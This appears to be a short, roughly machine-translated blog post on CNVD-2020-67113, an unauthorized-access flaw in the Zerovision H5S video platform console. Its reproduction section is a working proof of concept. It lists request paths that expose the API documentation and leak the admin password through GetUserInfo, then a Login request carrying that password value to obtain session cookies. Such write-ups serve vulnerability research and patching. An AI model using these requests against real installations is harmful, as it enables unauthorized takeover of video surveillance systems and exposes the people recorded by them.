Zerovision Technology H5s Video Platform Getuserinfo Information Leakage Vulnerability Cnvd 2020 67113
Zerovision Technology H5s Video Platform Getuserinfo Information Leakage Vulnerability Cnvd 2020 67113
Zero-Sight Technology H5S Video Platform GetUserInfo Information Leakage Vulnerability CNVD-2020-67113
Vulnerability Description
Zero Vision Technology (Shanghai) Co., Ltd. serves customers with leading video technology, and is committed to simplifying the development of IoT videos. Relying on new technologies such as HTML5 WebRTC, it realizes simplification of video playback on all platforms. Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE has an unauthorized access vulnerability.
Vulnerability Impact
Zerovision Technology H5S video platform
Network surveying and mapping
Vulnerability reappears
Login page
API documentation can be accessed unauthorized
1
/doc/api.html
Interface with user account password leak
1
/api/v1/GetUserInfo?user=admin&session=
Password in the login interface is the account password existing in the interface, and you can directly send a request to obtain cookies.
1
/api/v1/Login?user=admin&password=02ed400b8d9289f311fc1d68a83fdaaa
Visit the main page after the request is successful
This post is licensed under CC BY 4.0 by the author.